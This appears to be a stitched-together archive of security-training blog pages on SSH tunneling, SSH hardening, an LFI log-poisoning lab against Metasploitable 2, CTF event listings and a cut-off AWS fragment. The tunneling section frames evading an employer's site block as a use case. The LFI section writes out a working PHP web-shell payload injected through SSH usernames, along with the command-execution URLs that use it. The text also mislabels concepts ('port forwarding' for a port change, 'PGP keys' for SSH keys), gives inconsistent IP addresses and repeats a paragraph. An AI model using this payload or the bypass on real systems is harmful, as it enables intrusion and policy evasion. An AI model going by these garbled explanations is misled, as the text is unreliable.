How to perform Local SSH Tunneling?

How to secure an SSH connection?

What is Local SSH Tunneling?

SSH Tunneling

What happens when local SSH Tunneling occur? Basically, the host and port values get translated to the host and port values of the remote end of the channel. Through this way, a client application gets connected to the local endpoint of the channel whilst the remote one becomes connected to the remote end accordingly.

Let’s now take an example of local SSH tunneling and let’s see how effective it could be. Consider for instance that the company which you work for intentionally blocks using Facebook.com. Therefore, with normal internet access, such website cannot be reached by an innocent worker inside the company. However, such restriction could be simply bypassed by creating an SSH tunnel.

If the machine used inside a company is named “work”, then let’s call the remote machine as “home”. Now, “work” wants to get connected to “home” via an SSH channel. For such home machine will be utilized as a remote server for any services desired, it must be having a public IP to connect to in the first place. The following code should be executed on the work machine for the sake of getting the tunnel established.

ssh -L 9001:facebook.com:80 home

Please note that in the previous code snippet shows that a local port forwarding is used “L” and the local port to be forwarded is 9001 while the remote host is Facebook.com. And of course, the remote port is 80 and it resides on the home machine. In general, the syntax could be typed as the following:

-L <local-port-to-listen>:<remote-host>:<remote-port>

This means that the SSH client of the home machine gets connected to that of the work machine which usually happens on the port number 22. Local requests on the work machine are listened to through the binding of port 9001 to do so.

Connecting to Facebook.com then is not of the work machine’s business anymore. It is now in fact of the home machine’s since it will have to use port 80 to get connected to Facebook.com. It is also important to get to know that when the home machine connects into Facebook.com, it does so without any encryption.

Connecting now to the work machine into this link http://localhost:9001 on the browser will definitely yield a connection into the home machine where Facebook.com gets loaded. So, thinking about it this way, such remote device at home could be simply perceived as a gateway which facilitates the connection between the work machine and Facebook.com. The full general syntax snippet of code becomes like the following then

ssh -L <local-port-to-listen>:<remote-host>:<remote-port><gateway>

SSH Tunneling

It is even possible that a port in the home computer could be used instead of getting connected to an external host. The following syntax could be used in this case.

-L 5900:localhost:5900 home (Executed from 'work')

A good question now is: what does such line of code do? A connection gets established to port 5900 on the home machine where a VNC client could listen freely. All data from any kind could be transferred using this method such that it is not the browsing sessions which are to be transferred through such a tunnel.

Hence, depending on such methodology, SSH sessions could be tunneled as well. This is very effective when there is a banned computer to create SSH session with. Such banned computer could be connected to the host through an SSH tunnel using local port forwarding. Such local port forwarding could be executed using the following command as encryption happens to the transferred data between the work machine and banned machine.

ssh -L 9001:banned:22 home

And it is important to start the SSH service on 9001 from where the session
will get tunneled to the banned computer via the home machine.

ssh -p 9001 localhost

How can local SSH Tunneling be performed? 

SSH Tunneling

A good thing about local SSH tunneling is that a computer not connected to the internet could be communicated with through this methodology. While dynamic tunneling needs SOCKS proxy in order to get all the TCP traffic tunneled, local tunneling needs the IP address of the destination machine.

Throughout the following lines, we will be establishing a connection between a remote PC and a local system of a different network. Let’s take the following five points for granted before we get to start essentially:

  1. There is an SSH server which is two Ethernet interface.
  2. The local IP address is 192.168.1.217,
  3. While the IP address of the remote machine is 192.168.1.219
  4. The IP address of the 192.168.10.2 is connected to the local network system 192.168.10.2
  5. The IP address of the SSH client is basically 192.168.10.2

 

The following steps are to get followed for the sake of establishing the Local SSH tunneling:

  1. Open the terminal and type the following command to get the network configuration:
    ifconfig
  2. The configuration of SSH server should now show that there are two IP addresses connected:
    192.168.1.217 and 192.168.10.1
  3. The configuration of SSH server should also appear after typing the aforementioned command. The following IP address should appear as running as an SSH client:
    192.168.10.2
  4. When the remote PC which has the IP address of 192.168.1.219 attempts to get connected to the SSH server having the IP address of 192.168.1.217, it will get a successful login inside server through port 22.
  5. However, if the same remote machine of the IP address of 192.168.1.219 tries to get connected to the SSH client of the IP address of 192.168.10.2, a network error will appear since both machines belong to a different network from the other one.
  6. Let’s now use of PuTTY software to get the SSH local tunneling established.

 

7. Get connected to the SSH server of the IP address of 192.168.1.22 through port number    22

8. Navigate to the left column of “Category” and choose “SSH” under which “Tunnel” should     be clicked on.

9. Then, inside the “Source port” type 7000 for instance.

10. Then, inside the “Destination” type 192.168.10.2:22

11. Click on “Local” then now press “Add”.

12. After it is done with the process. Press “Open”.

13. Now, the connection between a remote pc and an SSH server should be on.

14. Open the PuTTY software again or just a new window of it.

15. Under “Host Name (or IP address)” type a name for this hostname; for example, just       type “localhost”.

16. Under “Port” type “7000” which we configured before.

17. Now, trying to connect to the SSH client will yield a connection with no network error.        This will be performed successfully. Congratulations!!

 

References

http://www.hackingarticles.in/beginner-guide-ssl-tunneling-dynamic-tunneling/

http://www.hackingarticles.in/perform-local-ssh-tunneling/

https://en.wikipedia.org/wiki/Tunneling_protocol

https://en.wikipedia.org/wiki/SOCKS

https://en.wikipedia.org/wiki/Comparison_of_proxifiers

https://en.wikipedia.org/wiki/TUN/TAP

http://www.hackingarticles.in/perform-remote-tunneling/

http://www.hackingarticles.in/beginner-guide-ssl-tunneling-dynamic-tunneling/

http://linux.byexamples.com/archives/115/ssh-dynamic-tunneling/

https://ypereirareis.github.io/blog/2016/09/19/ssh-tunnel-local-remote-port-forwarding/

https://coderwall.com/p/pmf0tw/understand-local-remote-and-dynamic-ssh-tunneling

http://www.hackingarticles.in/time-scheduling-ssh-port/

http://www.hackingarticles.in/web-server-exploitation-ssh-log-poisoning-lfi/

http://www.hackingarticles.in/metasploitable-3-exploitation-using-brute-forcing-ssh/

http://www.hackingarticles.in/secure-port-using-port-knocking/

https://chamibuddhika.wordpress.com/2012/03/21/ssh-tunnelling-explained/

https://en.wikipedia.org/wiki/RealVNC

https://nmap.org/

http://resources.infosecinstitute.com/metasploitable-2-walkthrough/#gref

https://www.vulnhub.com/entry/metasploitable-2,29/

https://github.com/rapid7/metasploitable3

How to Perform Dynamic SSH Tunneling?

What is Dynamic SSH Tunneling?

One of the most effective SSH tunneling methods is the dynamic tunneling. Through such method, different remote destinations could simply get tunneled into. How does this actually happen? It actually utilizes one port for the sake of opening SOCKS service on it. Then, an application could depend on such port when sending its own traffic. The client side should get a SOCKS proxy created which gets utilized by an application to determine the destination of the traffic when it leaves the other end of the SSH tunnel. The following command is to be typed on the work machine.

ssh -D 9001 home (Executed from ‘work’)

It is important to understand the previous command very well. The “D” actually refers to the dynamic SSH tunneling. SSH here is used for the sake of creating SOCKS proxy which listens for all connections at port number 9001. All the requests then get routed towards work and home machines depending on the direction. Such connection happens through an encrypted SSH channel. For this, it is required to configure the browser to point to the SOCKS proxy at port 9001 at localhost.

How can SOCKS relate to SSH tunnels?
SSH Tunneling

In fact, SOCK5 represents a means to secure a connection between two remote devices where SSH is used to establish a connection between them both. So, what is the difference between SSH and SOCKS in this regard? Mainly in order to establish an SSH service or connection, it has to specify a specific port on a remote machine. However, SOCKS can allow an entire application to be run remotely through using the SOCKS proxy server which is local. Specifying a particular remote server or remote port to get connected into is no longer the case when dealing with SOCKS, which gives a comparably more freedom for its user.

Let’s consider now the case when an application does not support SOCKS in the first place! What could be the solution in such case? There is what is referred to as a proxifier. The idea behind such software is that it is a mere software program which opens the door for any other program to get connected through a proxy server even if such program does not support it. This is done by getting the network requests of such programs intercepted and modified before passing through the proxy server. In this manner, an application gets redirected into a local SOCKS proxy server. SSH is supported directed by some proxifiers such as Proxycap. This means that the need of an SSH client becomes vanished when using such a proxifier.

How can dynamic SSH Tunneling be performed? 

SSH Tunneling

Throughout the following lines, we will walk through the methodology to establish a connection between a remote machine and another local system residing on a different network. Let’s take the following five points for granted before we get to start essentially:

  1. There is an SSH server which is two Ethernet interface.
  2. The local IP address is 192.168.1.22
  3. While the IP address of the remote system is 192.168.1.21, residing outside of the network in the first place.
  4. The IP address of 192.168.10.2 is connected to another local network system of IP address of 192.168.10.2
  5. The SSH client has the following IP address: 192.168.1.21

 

The following steps are to get followed for the sake of establishing the Remote SSH tunneling. A remote machine having an IP address of 192.168.1.21 attempts to get connected to a local machine at work network of IP address 192.168.10.2. Such attempt gets denied due to the fact that there is a firewall block occurring against such incoming traffic. In order for a remote machine to get connected to a local machine inside a network, the remote machine will connect to an SSH server inside the network, which will forward the connection to an SSH client which is local inside the network. It is important in the first place that both the SSH client and SSH server have their SSH service activated on them.

  1. Open the terminal and type the following command to get the network configuration:
    ifconfig
  2. The configuration of SSH server should now show that there is two IP address connected:
    192.168.1.22 and 192.168.0.1
  3. The configuration of SSH server should also appear after typing the aforementioned command. The following IP address should appear as running as an SSH client on Ubuntu:
    192.168.10.2
  4. When the remote PC which has the IP address of 192.168.1.21 attempts to get connected to the SSH server having the IP address of 192.168.1.22, it will get a successful login inside server through port 22.
  5. However, if the same remote machine of the IP address of 192.168.1.21 tries to get connected to the SSH client of the IP address of 192.168.10.2, a network error will appear since both machines belong to a different network from the other one.
  6. Let’s use of PuTTY software to get the SSH local tunneling established.

 

7. Get connected to the SSH server of the IP address of 192.168.1.22 through port number  22

8. Navigate to the left column of “Category” and choose “SSH” under which “Tunnel” should be clicked on.

 

9. Then, inside the “Source port” type 7000 for instance.

10. Click on “Dynamic” then now press “Add”.

11. After it is done with the process. Press “Open”.

12 Now, the connection between a remote pc and an SSH server should be on.

13 Open the PuTTY software again or just a new window of it.

14 Under “Host Name (or IP address)” type “192.168.10.2”

15 Under “Port” type “22” for the SSH service

16 “Open” should be pressed now.

17 Open the previously used window of PuTTY again now.

18 Navigate to the left column of “Category” and choose “Connection” under which “Proxy” should be clicked on.

19 Then, inside the “Proxy type” select “SOCKS5”

20 Under “Host Name (or IP address)” type “127.0.0.1”

21 Under “Port” type “7000” which was previously configured.

22 Now, “Open” should be pressed.

23 Now, trying to connect to the SSH client will yield a connection with no network error. This will be performed successfully. Port 7000 is the used port in such methodology. Congratulations!!

 

References

http://www.hackingarticles.in/beginner-guide-ssl-tunneling-dynamic-tunneling/

http://www.hackingarticles.in/perform-local-ssh-tunneling/

https://en.wikipedia.org/wiki/Tunneling_protocol

https://en.wikipedia.org/wiki/SOCKS

https://en.wikipedia.org/wiki/Comparison_of_proxifiers

https://en.wikipedia.org/wiki/TUN/TAP

http://www.hackingarticles.in/perform-remote-tunneling/

http://www.hackingarticles.in/beginner-guide-ssl-tunneling-dynamic-tunneling/

http://linux.byexamples.com/archives/115/ssh-dynamic-tunneling/

https://ypereirareis.github.io/blog/2016/09/19/ssh-tunnel-local-remote-port-forwarding/

https://coderwall.com/p/pmf0tw/understand-local-remote-and-dynamic-ssh-tunneling

http://www.hackingarticles.in/time-scheduling-ssh-port/

http://www.hackingarticles.in/web-server-exploitation-ssh-log-poisoning-lfi/

http://www.hackingarticles.in/metasploitable-3-exploitation-using-brute-forcing-ssh/

http://www.hackingarticles.in/secure-port-using-port-knocking/

https://chamibuddhika.wordpress.com/2012/03/21/ssh-tunnelling-explained/

https://en.wikipedia.org/wiki/RealVNC

https://nmap.org/

http://resources.infosecinstitute.com/metasploitable-2-walkthrough/#gref

https://www.vulnhub.com/entry/metasploitable-2,29/

https://github.com/rapid7/metasploitable3

How to secure an SSH connection?

Quick Background about SSH:

SSH

SSH is actually a cryptographic network protocol. It works for the application layer of the Network suite. But what is it for then? It is mainly used for operation over a network which is not secured. Computer systems, for example, could be accessed remotely by users through such network protocol.

The architecture utilized by SSH protocol has the form of a client-server basis. An SSH server is connected to through an SSH client. While login through command-line and remote command execution are supported by most of the applications, it has the ability to work for any network service as long as one of the two versions are used: SSH-1 and SSH-2.

Quick Background about PuTTY:

SSH

PuTTY on its own has no meaning, yet it is a free and open-source software, In fact, it is a terminal emulator, serial console, and network file transfer application. A plenty of network protocols are supported through such application such as Secure Copy (SCP), Secure Shell, Telnet, Rlogin, and raw socket connection. Moreover, a serial port could be connected by PuTTY.

Netcat

SSH

Reading from and writing to a network connection through protocols like Transmission Control Protocol (TCP) or User Datagram Protocol (UDP) are always considered a great step for both a security administrator or an attacker. Both of these categories of individuals utilize whatever data they get for a completely different purpose than the other.

Netcat provides an efficient means of investigating a network from the back-end side –servers– and further establish any new connection inside networks using the aforementioned protocols. It has the capability to be run on its own or through scripts or other programs.

Kali Linux

ssh_kali

One of the most important security tools to understand and work on very well is, in fact, Kali Linux. But let’s discuss its benefits in a nutshell.

⦁ Penetration testing and digital forensics always consider such tool as an essential one for their purposes.
⦁ It provides its user with a variety of tools and functions which are categorized into thirteen categories:
⦁ Information Gathering such as Dmitry
⦁ Vulnerability Analysis like Inguma
⦁ Tools for exploitation as Metasploit Framework
⦁ Wireless Attacks like WIFI Honey
⦁ Forensics such as Binwalk
⦁ Web Applications like Skipfish
⦁ Stress testing like FunkLoad
⦁ Sniffing and Spoofing as Wireshark
⦁ Password attacks like done by TrueCrack
⦁ Maintaining Access such as Intersect
⦁ Hardware hacking performed by dex2jar for instance
⦁ Reverse Engineering for which Apktool, for example, can be used
⦁ Reporting tools as MagicTree

How to setup an SSH server using port forwarding? 

ssh server

  1. Get the terminal opened and then inside it the following command should be simply typed to install an SSH server:
    sudo apt-get install openssh-server
  2. Get the SSH service started and running now through the following command:
    service ssh start
  3. It could be made sure of being working through the following command now:
    service ssh status
  4. Nmap should be used now inside Kali Linux’s terminal where scanning it could be performed through the next command:
    nmap -sV 192.168.1.17
  5. Such scanning shall show the port number 22 as an open port. PuTTY should be used now to configure such port. To accomplish such configuration successfully, the IP address should be typed under the “Host Name”. In addition, the port number should be set to be 22. It should be now selected and then “Open” should be clicked.
  6. Now, the password should be typed and then “Enter” should be pressed when done typing the password.

How can one secure an SSH connection?

ssh secure

  1. Get its service configured first of all.
  2. Let’s try port forwarding now. Open a file named ““sshd_config” which resides inside the following directory: computer>etc>ssh
  3. very port numbered 22 should be edited and altered into 2222 instead. This is basically done for the sake of forwarding SSH service from port 22 to port 2222.
  1. Nmap should be able to assure us of such forwarding using:
    nmap -sV 192.168.1.17
  2. An alternative way for the sake of such assurance depends on Telnet using the following command. This port will be shown whether it is open or not. Plus, the type of connection it is listening to will be displayed as well.
    telnet 192.168.1.17 2222
  3. Netcat could be also used for this sake of assurance using the following command. This will also display the current service running on port 2222.
    nc 192.168.1.17 2222

How to set SSH Connection using PGP Keys?

ssh pgp

  1. PuTTy key generator should be downloaded first of all and then installed.
  2. Get it open and then “Generate” should be clicked on now.
  3. A public key along with a private key will get generated. Get the private key saved for further reference. This is important. The file containing it could be renamed with any desired naming.
  4. Get the Linux terminal opened now and the following command should be typed now:
    ssh-keygen
  5. A folder called “.ssh” gets now created as a result of the previous command. Inside it, get a text file named “authorized_keys” created.
  6. Inside the same folder, a file named “ssh login key.ppk” should get copied.
  7. The .ssh folder should be now moved into inside the terminal. For this sake, the following command should be used.
    puttygen –L “ssh login key.ppk”
  8. This will yield in getting a key generated. The key should then get copied into the empty created with the authorized_keys.
  9. Inside PuTTY configuration, an Auto-login username should be entered under the Data section.
  10. The SSH login key which is essentially the private key could have its path changed under SSH>Auth.
  11. Both the IP address and the port number 2222 should now both be typed in their respected places under the Session tab.

 

12. Now, “Open” should be clicked, and then the password should be typed now and    “Enter” should be pressed through the keyboard.

alice

13. Getting the password entirely disabled will help improve the security level. This will enhance our security and stop us from being vulnerable by a hacking method of a  password. Opening “sshd_config” inside computer>etc could allow us to disable this aspect.

14. Inside this file, password authentication should be changed from yes to no. It is set by default as yes and the line is commented. So, uncommenting the line is important as well  in this step.

References

http://www.hackingarticles.in/setup-ssh-pentest-lab/

http://www.hackingarticles.in/secure-ssh-port-using-port-forwarding-beginner-guide/

http://www.hackingarticles.in/perform-local-ssh-tunneling/

http://www.hackingarticles.in/time-scheduling-ssh-port/

http://www.hackingarticles.in/beginner-guide-ssl-tunneling-dynamic-tunneling/

How to do SSH port forwarding on Windows?

What is port forwarding in the first place? 

At the time the packets traverse a network gateway like a firewall or a router, the communication request gets redirected from a combination of a specific address and a particular port number to another one. This is considered as an application of network address translation (NAT).  Such methodology is really useful especially when dealing with a suspicious network or being on an insecure network.

In fact, the enhancement of security which such port forwarding implies lies in the fact that an attacker will not easily know such port forwarding since this happens on the internal side of a network gateway. In other words, an attacker will not be familiar easily with such network mapping which is configured on the firewall for some specific bunch of important ports to other ports.

What to know about SSH?

ssh

SSH is actually a cryptographic network protocol. It works for the application layer of the Network suite. But what is it d for then? It is mainly used for operation over a network which is not secured. Computer systems, for example, could be accessed remotely by users through such network protocol.

The architecture utilized by SSH protocol has the form of a client-server basis. An SSH server is connected to through an SSH client. While login through command-line and remote command execution are supported by most of the applications, SSH has the ability to work for any network service as long as one of the two versions are used: SSH-1 and SSH-2.

Know what is the purpose of port forwarding?

In fact, there is a plenty of applications where port forwarding works the best. Among such applications are:

  • In a private LAN where an HTTP server gets run.
  • In a private LAN between a host and from the internet through SSH connection.
  • A private LAN between a host and from the internet through FTP connection.
  • In a private LAN where a game server is run and available in public.

What about Windows and SSH? 

ssh

ssh

Windows is okay for SSH usage but with limited integrations. Unix-like operating systems can get an access to shell accounts using SSH. Protocols like Telnet, Rlogin, rsh, and rexec was intended to get replaced by SSH when first came into existence.

The reason is that such protocols send valuable information such as passwords in a plain text format, which is completely insecure. Any packet analyzer has the ability to get such packets sniffed and the password becomes easily accessible then.

The reason is that such protocols send valuable information such as passwords in a plain text format, which is completely insecure. Any packet analyzer has the ability to get such packets sniffed and the password becomes easily accessible then.

Why is securing SSH port important? 

ssh

Hacking is very common, and it basically exploits any open port of a system. Does this mean that all the ports should get closed? Well, of course, the answer to this question is no because closing ports will not give a user the ability to even work on his or her computing device. So what is the solution then? It is to secure the used ports even when they are not closed. When using the SSH port, it is also important to get it secured as well.

OpenSSH and OSSH

ssh

For the sake of making the software free and available to get used without any cost, the older 1.2.12 release of the original SSH program was the starting point when it was an open source software version. In 1999, using the codebase of such version, Björn Grönvall’s OSSH got released.

OpenBSD developers then worked on developing and improving the code of Grönvall. The result was the successful OpenSSH, which shipped with the 2.6 release of OpenBSD. OpenSSH was then able to get ported onto other operating systems through what is referred to as a portability branch.

OpenSSH supported a plenty of operating systems to the extent that back in 2005 it was the only SSH implementation running on several platforms. OSSH, on the other hand, came to vanish at the same time when OpenSSH got much more viral and popular.

Nmap

ssh

Network Mapper (Nmap) security scanner contained within itself another implementation of Netcat and granted it Ncat as a new name, where it represented another cross-platform the same as Nmap. This was back in 2005, and several features were added to it such as

⦁ It is allowed to redirect connections of TCP/UDP
⦁ Connection Brokering is also supported
⦁ Both from the server and the client sides are supported SOCKS4
⦁ Processes of Ncat has the ability to be chained
⦁ Proxy chaining is also aided by Ncat; this feature is often reoffered to as HTTP CONNECT proxying.
⦁ Even Secure Socket Layers (SSL) has the privilege to get listened to or connected to by Ncat
⦁ Filtration of Internet Protocol (IP) address/connection is also supported.

How to perform port forwarding to secure SSH port in Windows?

ssh

  1. Get the OpenSSH tool downloaded and then installed on your Windows machine.
  2. Make sure that port 22 is open. This can be performed using Nmap security tool. The following command will be helpful in our case:
    nmap 192.168.1.17
  3. Let’s consider that it is open and it is already listening to SSH service.
  4. Get the file named “sshd_config” opened now. This file could be found inside the following directory:
    my computer>local Disk(C:)>program files>OpenSSH>etc
  5. Port 22 will appear as the one which is listened to. Get it altered into 3221 for instance.

 

6. This means that port 3221 became the one listened to by SSH protocol instead of port     22.

7. Get back to the command prompt and get the SSH service restarted now on the machine to see the port. This could be simply done with the help of the following command. It will first stop the service then reopen it again.

C:\WINDOWS\SYSTEM32>net stop opensshd
C:\WINDOWS\SYSTEM32>net start opensshd

8. Nmap is able to get such action confirmed through its own scan as well. The following command should be used then.

nmap -A 192.168.1.17

9. Such scan shows the forwarded port clearly of 3221, making it still easy for attackers to get into the system.

References

http://www.hackingarticles.in/setup-ssh-pentest-lab/

http://www.hackingarticles.in/secure-ssh-port-using-port-forwarding-beginner-guide/

https://en.wikipedia.org/wiki/Port_forwarding

How to perform SSH Log Poisoning through LFI to exploit a web server?

It is important to get to know a great method to exploit a web server which essentially suffers from local file inclusion (LFI). Let’s assume we are working on a Metasploitable 2 target and the operating system to run the attack is Kali Linux.

LFI

The following steps explain how one can perform this process on Kali Linux:

  1. Open the Kali Linux terminal.
  2. Connect the target through using SSH service. The following command can be in a great use then
    ssh [email protected]
  3. Check the permission of auth.log file beforehand using the following command
    ls -l /var/log/auth.log
  4. Most of the time the auth.log file appears to have the read-write permission. They should appear like the following:
    -rw-r—r—r—syslog adm …...
  5. We can now have access to the file and read all read all its logs through the following command:
    tail -f /var/log/auth.log
  6. We can walk through the logs and check the specific logs of the user named “mfsadmin”.
  7. Now, let’s attempt to connect to the web server using a counterfeit username. One can use the following command for an invalid login
    ssh [email protected]
  8. The permission should now be denied and shown clearly as follows
    "Permission denied, please try again."

    LFI

  9. Then, get back to the auth.log file and ensure whether such fake or invalid attempt has been recorded or not. It should show that such invalid user tried to get access. The following should display if the user used the IP address of 192.18.1.104
    "Failed Password for invalid user hacker from 192.168.1.104 port 56566 ssh2"
  10. This means that a login whether a passed one or an invalid one, it will get recorded and shown inside the logs. Then, let’s now try passing a PHP code as an invalid user and see how the reaction of such deed will be. The following command provides a PHP invalid user login attempt.
    ssh ‘<?php system($_GET[‘c’]); ?>’@192.168.1.105
  11. Then, get back again to the auth.log file and make sure whether such fake or invalid attempt has been recorded or not. It should show that such invalid user tried to get access. The following should display if the user used the IP address of 192.18.1.104
    "Failed Password for invalid user  <?php system($_GET[‘c’]); ?> from 192.168.1.104 port 49642 ssh2
  12. Let’s assume that you have previously created LFI and now we try to browse to it using the following link:
    192.168.1.105/lfi/lfi.php
  13. An error will appear looking like local file inclusion vulnerability.
  14. The auth.log file should get included as a parameter now through the following URL inside the browser:
    192.168.1.105/lfi/lfi.php?file=/var/log/auth.log
  15. Note that a warning will display, with the following text:
    Warning cannot execute a blank command
  16. Let’s discuss what this actually means. The PHP code which previously contained the CMD comment has already been injected. Any command can then get sent as a parameter now.
  17. Let’s now browse into
     "192.168.1.105/lfi/lfi.php?file=/var/log/auth.log&c=ps"
    

    this will dump the data of auth.log besides executing a comment given through cmd

  18. Let’s now browse into
     "192.168.1.105/lfi/lfi.php file=/var/log/auth.log&c=pwd". 
    

    This way, the results can display inside the window.

What is Kali Linux? 

One of the most important security tools to understand and work on very well is, in fact, Kali Linux. But let’s discuss its benefits in a nutshell.

LFI

⦁ Penetration testing and digital forensics always consider such tool as an essential one for their purposes.
⦁ It provides its user with a variety of tools and functions which fall into thirteen categories:
⦁ Information Gathering such as Dmitry
⦁ Vulnerability Analysis like Inguma
⦁ Tools for exploitation as Metasploit Framework
⦁ Wireless Attacks like WIFI Honey
⦁ Forensics such as Binwalk
⦁ Web Applications like Skipfish
⦁ Stress testing like FunkLoad
⦁ Sniffing and Spoofing as Wireshark
⦁ Password attacks like done by TrueCrack
⦁ Maintaining Access such as Intersect
⦁ Hardware hacking performed by dex2jar for instance
⦁ Reverse Engineering that can for instance use Apktool
⦁ Reporting tools as MagicTree

What is Metasploitable?

LFI

Basically, Metasploitable is a vulnerable machine which is intended to be used for the sake of purposes such as being trained, test an exploit or even general target practice. The unique aspect about Metasploit is that it has the capability to check vulnerabilities on the layer of the operating system and network services, not merely the applications layer.

Metasploitable 2 is like a good bag which contains a bunch of security tools such as Metasploit. A production environment usually has Metasploit 2 to help them with the process of examining and practicing the exploits of vulnerabilities.

Metasploitable 3 is even a newer version of Metasploitable. It is a virtual machine essentially built from the ground up with a lot of security vulnerabilities.  Through such version, Metasploit is the security tool utilized to test exploits. The BSD-style license is the one under which Metasploitable3 got released originally.

The following are requirements to run Metasploitable:

  1. An operating system which is capable of running all of the required applications listed below.
  2. VT-x/AMD-V Supported Processor recommended
  3. 65 GB Available space on drive
  4. 4.5 GB RAM

So we have mentioned that Metasploitable basically uses Metasploit in the first place. Let’s talk in the last few lines about Metasploit in fact.

LFI

The Metasploit Project is a computer security project that shows the vulnerabilities and aids in Penetration Testing. Penetration testing refers to an authorized simulated attack on computer system. It looks for security weaknesses, and Instruction Detection System (IDS) signature, which on the other hand monitors a network or systems for malicious activities. The most related sub-project is the famous open source Metasploit Framework, which is the most common exploit development framework in the world. I will elaborate on this framework idea later on in this article.

Finally, one could use Metasploit to perform some legitimate and unauthorized accesses and activities on computer systems. In this regard, it is no different from any other commercial similar products such as Immunity’s Canvas or Core Security Technologies. Metasploit, however, is commonly applicable in breaking into remote systems or test for a computer system vulnerability.

References

http://www.hackingarticles.in/beginner-guide-ssl-tunneling-dynamic-tunneling/

http://www.hackingarticles.in/perform-local-ssh-tunneling/

https://en.wikipedia.org/wiki/Tunneling_protocol

https://en.wikipedia.org/wiki/SOCKS

https://en.wikipedia.org/wiki/Comparison_of_proxifiers

https://en.wikipedia.org/wiki/TUN/TAP

http://www.hackingarticles.in/perform-remote-tunneling/

http://www.hackingarticles.in/beginner-guide-ssl-tunneling-dynamic-tunneling/

http://linux.byexamples.com/archives/115/ssh-dynamic-tunneling/

https://ypereirareis.github.io/blog/2016/09/19/ssh-tunnel-local-remote-port-forwarding/

https://coderwall.com/p/pmf0tw/understand-local-remote-and-dynamic-ssh-tunneling

http://www.hackingarticles.in/time-scheduling-ssh-port/

http://www.hackingarticles.in/web-server-exploitation-ssh-log-poisoning-lfi/

http://www.hackingarticles.in/metasploitable-3-exploitation-using-brute-forcing-ssh/

http://www.hackingarticles.in/secure-port-using-port-knocking/

https://chamibuddhika.wordpress.com/2012/03/21/ssh-tunnelling-explained/

https://en.wikipedia.org/wiki/RealVNC

https://nmap.org/

http://resources.infosecinstitute.com/metasploitable-2-walkthrough/#gref

https://www.vulnhub.com/entry/metasploitable-2,29/

https://github.com/rapid7/metasploitable3

InfoSec Addicts Saturday Hackathon

InfoSec Addicts will be hosting an in person meet and greet, with some training sessions, an install fest, and a Capture The Flag (CTF). C’mon down to Alexandria Virginia for the day. Do some networking with other security professionals, get your laptop setup for security. Lunch, dinner, and snacks will be provided.

 

InfoSec Addicts

Install Fest (10th February 2018):

We will run an install fest from 12:30 noon to 3pm EST. This is your chance to bring your laptop and have get some help with setting up the following:

  • VMWare/Virtualbox
  • Kali Linux
  • Adding security tools to your Linux host
  • Virtual machine swaps (bring external hard drives)
  • Building your own hacklab

Training Sessions (10th February 2018):

  • Introduction to packet analysis with WireShark taught by Joe McCray (in person and live online from 12:30pm EST to 1:30pm)
  • Advanced Web App Security Testing with Burp Suite taught by Jason Haddix (in person and live online from 4pm EST to 6pm)

 

InfoSec Addicts

Capture The Flag

We will also host a CTF from 7pm – 9pm that is geared towards beginner/intermediate participants.

 

Location (10th February 2018):

  • 10th February 2018 starting at 12noon
  • 901 North Pitt Street Suite 105
  • Alexandria, Va 223314

 

Event Schedule (10th February 2018):

  • Lunch & Meet & Greet (12noon)
  • Install fest (12:30noon to 3pm)
  • Introduction to packet analysis with WireShark taught by Joe McCray (in person and live online from 12:30pm EST to 1:30pm)
  • Advanced Web App Security Testing with Burp Suite taught by Jason Haddix (in person and live online from 4pm EST to 6pm)
  • Dinner & networking (6pm)
  • Capture The Flag (7pm)

 

Event Cost:

  • $50 if purchased before February 5th, 2018
  • $75 if purchased from February 6th to February 9th
  • $100 if purchased at the door
  • NOTE: Prices are the same for online students attending the training sessions

InfoSec Addicts

Fill out the form below to signup:

$50.00Select options

Capture The Flag (CTF) competition

We will be running Capture The Flag (CTF) competitions a few times this year. Here are the particulars:

 

Location of game: Online

Game Type: Team Network/Web Application/Programming Attack competition

Game Play: Scoring via placing a team file (flag) in the target servers’ root (/root or c:\ directory)

Skill Level: Beginner/Intermediate

Number of players per team: Teams can be up to 15 players

 

This type of game is very well suited to college infosec groups, CCDC players, security enthusiasts, blue teams, pentest teams, and red teams. It’s a pure attack game. There is no defense necessary, nor system administration tasks to do. You connect to the VPN and have fun attacking the targets in the network and scoring points.

 

Date/Time:

CTF Prep Class September 9th from 10 am – 4 pm EST CTF prep class
CTF Prep Class September 16th from 10 am – 4 pm EST CTF prep class

The CTF Prep students will have access to the target lab network from September 8th – 22nd.

The actual CTF event will be on September 23rd from 12 noon to 8 pm EST.

Cost:

CTF Prep class cost is: $100
CTF Competition is: $50 per participant

Note: CTF Prep class participants acquire automatic registration for the CTF Competition

Signup now and let’s have some fun

Capture The Flag (CTF) Competition

$50.00Select options

 

 

Game Basics:

This will be a fun game. Each teams’ members will be given VPN access to the InfoSec Addicts target lab/CTF environment. Each team will be given a gpg encrypted file that will serve as the team’s flag. That flag file must be copied to the appropriate directory on the victim server to count as that server being compromised and to have points awarded to that team.

 

Game Rules:

– One can use Nessus and Metasploit, but beware bandwidth of penalties, so keep scanning to a minimum.
– Password brute-forcing is acceptable
– Using commercial pentesting tools is acceptable (ex: Core, Saint, Canvas)
– Scoring server will verify that target host has been successfully exploited
– Man-in-the-middle attacks of any kind are NOT acceptable
– Attacking other teams is NOT acceptable

 

Game Requirements:

Stable internet connection with a minimum of 1Mbit/sec that can connect to UDP 1194 (OpenVPN port)

No commercial VPN licenses required to participate

 

Game Prizes

1st Place – 3 FREE InfoSec Addicts classes per team participant
2nd Place – 2 FREE InfoSec Addicts classes per team participant
3rd Place – 1 FREE InfoSec Addicts classes per team participant

Signup now and let’s have some fun

Capture The Flag (CTF) Prep Class

$100.00Select options

 

How to Use Amazon EC2 Instance Store Encryption to Protect Data at Rest?

1. Create Amazon S3 bucket: amazon ec2

The created S3 bucket stores the encrypted password file. Encryption of the file system happens using such a password or key. When a boot happens for an Amazon EC2 instance, the files are copied, the encrypted password is read, the password is decrypted, and the plaintext password is retrieved. Utilization of this password happens when encrypting the file system on the instance store disk. Through the first step, the creation of an S# bucket occurs to enable the storage of the encrypted password file on it. Application of necessary permissions happens afterward. Additional permissions to the bucket to enable endpoint access are necessary whenever using Amazon VPC endpoint for Amazon S3.

  1. Sign into the S3 bucket and select “Create Bucket”.
  2. Then, enter the bucket name in the box named “Bucket Name”, then click on “Create”.
  3. All the details of the newly created bucket will appear in the right pane.

2. Configure the IAM roles and permission for the created S3 bucket

Using AWS Key Management Service (KMS), the encrypted password could be decrypted after essentially the encrypted password file being read from S3. One could assume a role with the right access permissions to the bucket of S3 by applying the IAM policy which that is configured in this step. “your-bucket-name” is that bucket used for the purpose of saving and storing the password file on it.

  1. Sign into the AWS Management Console to reach the IAM console.
